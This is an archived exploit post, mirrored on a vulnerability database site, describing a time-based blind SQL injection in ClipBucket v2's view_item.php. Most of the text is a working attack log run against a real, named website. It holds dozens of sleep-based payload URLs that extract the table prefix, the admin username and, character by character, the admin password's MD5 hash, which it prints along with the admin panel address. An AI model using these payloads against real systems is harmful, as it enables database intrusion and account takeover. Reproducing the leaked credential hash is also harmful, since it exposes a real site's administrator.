Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ClipBucket 2 Blind SQL Injection

🗓️ 18 Jul 2012 00:00:00Reported by AkastepType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

ClipBucket v2 Blind SQL Injection vulnerabilit

Code
`===============================================================================  
Vulnerable Software: ClipBucket v2  
Official Site: http://clip-bucket.com/  
  
================================================================================  
Exploited: In Wild.   
================================================================================  
  
Vuln Desc:  
ClipBucket v2 is prone to Blind Sql injection vuln.  
  
It seems it is pretty oldish version and i'm a bit lazy to "fingerprint" which build is vulnerable.  
  
Anyways, at least from source code of page it will "say" : <!-- ClipBucket v2 -->  
  
If you want to fingerprint is target site vulnerable:Use simply this way: (If you got "delay" this means it is vulnerable version)  
  
site.tld/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(1=1,sleep(50),0))--  
  
  
Theris also another way to fingerprint it:  
On vulnerable versions you will find such menu's: (Especially Help Menu section on index page)  
  
  
© ClipBucket v2 2012  
Home Contact Us About us Privacy Policy Terms of Serivce Help  
  
  
Real exploitation example:  
  
  
radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
  
table name 13 simvoldur burda  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x3133),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
table prefixi oyrenmek lazimdir:  
  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name1,1)=char(0x30),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
  
  
BU DUZ VERIR.  
//TRUE  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(0x616263,1,1)=char(0x61),sleep(54),0))--  
  
  
//TRUE tablin 1ci simvolu:  
c  
=========================  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,1,1)=char(99),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
2-ci simvolu: b  
  
  
3-cu simvolu: _  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,3,1)=char(95),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
table prefix: cb_  
  
  
  
  
User id ni yoxluyuruq:  
  
//TRUE  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(userid=char(49),sleep(54),0) from cb_users limit 1)--  
  
  
ID=1  
  
UNAME: admin  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users limit 1)--  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users where userid=1)--  
  
  
  
Passi cekmek yolu:  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(97),sleep(54),0) from cb_users where userid=1)--  
  
  
  
PASS:  
=======================================================  
1-ci simvol: 3  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(51),sleep(54),0) from cb_users where userid=1)--  
  
YAXUD:  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56250 ms  
  
=======================================================  
2-ci simvol: 5  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,2,1)=0x34,sleep(54),0) from cb_users where userid=1)--  
RTIME: 55578 ms  
=======================================================  
3-cu simvol: c  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,3,1)=0x43,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55579 ms  
  
=======================================================  
4-cu simvol: 3  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,4,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
RTIME 55656  
=======================================================  
5-ci simvol: a  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,5,1)=0x41,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56234  
  
=======================================================  
6-ci simvol: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,6,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 69672 ms  
=======================================================  
7-ci simvol: a (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,7,1)=0x41,sleep(54),0) from cb_users where userid=1)--  
  
RTIME : 17266 ms  
=======================================================  
8-ci simvol: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,8,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56141 ms  
  
=======================================================  
9-cu simvol: 6  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,9,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56125 ms  
=======================================================  
10-cu simvol: 2  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,10,1)=0x32,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56157 ms  
=======================================================  
11-ci simvol: 3  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,11,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55937 ms  
  
=======================================================  
12-ci simvol: b  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,12,1)=0x42,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56234  
=======================================================  
13-cu simvol: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,13,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56219 ms  
  
========================================================  
14-cu simvol: 9  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,14,1)=0x39,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56297 ms  
  
========================================================  
  
15-ci simvol: 5   
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,15,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55641 ms  
  
=========================================================  
16- ci simvol: f  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,16,1)=0x46,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56828 ms  
=========================================================  
  
17-ci simvol: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,17,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56296 ms  
  
=========================================================  
  
18-ci simvol: 5 (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,18,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55469 ms  
  
==========================================================  
  
19-cu simvol: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,19,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56390 ms  
=========================================================  
20-ci simvol: b  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,20,1)=0x42,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56375  
  
========================================================  
  
21-ci simvol: d (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,21,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME 55796 ms  
  
  
=======================================================  
  
22-ci simvol: d (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,22,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME 56406  
  
  
  
=======================================================  
23-cu simvol: f  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,23,1)=0x46,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55563 ms  
  
  
========================================================  
24-cu simvol: 0 (yoxla sonra)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,24,1)=0x30,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56172 ms  
  
========================================================  
25-ci simvol: 4   
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,25,1)=0x34,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56078 ms  
  
========================================================  
26-ci simvol: 9  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,26,1)=0x39,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55594 ms  
  
========================================================  
27-ci simvol: 6  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,27,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56094 ms  
  
  
========================================================  
28-ci simvol: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,28,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56109 ms  
  
========================================================  
29-cu simvol: c  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,29,1)=0x43,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55563 ms  
  
  
========================================================  
30-cu simvol: d  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,30,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55625 ms  
  
========================================================  
  
31-ci simvol: 5  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,31,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56188 ms  
  
  
=========================================================  
  
32-ci simvol: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,32,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55625 ms  
  
  
  
=========================================================  
So we got:   
  
uname: admin  
MD5 HASH: 35c3a6a6623b695f756bddf04967cd57  
Admin Panel: http://radio5.5.am/admin_area/  
  
  
//TRUE  
  
Verifying is obtainted hash valid?  
In this case it gives again "delay" which is hint for us: Obtained hash is valid.  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,33)=0x3335633361366136363233623639356637353662646466303439363763643537,sleep(54),0) from cb_users where userid=1)--  
  
  
[ ]Done[ ]  
  
  
  
  
  
+++++++++My Special thanks to:+++++++++++++++++++++  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
1337day.com  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all AA Team + to all Azerbaijan Black HatZ +   
*Especially to my bro CAMOUFL4G3.*  
++++++++++++++++++++++++++++++++++++++++++++++++  
  
Respect && Thank you.  
  
/AkaStep ^_^  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jul 2012 00:00Current
clipbucketblind sql injectionsecurity update .
30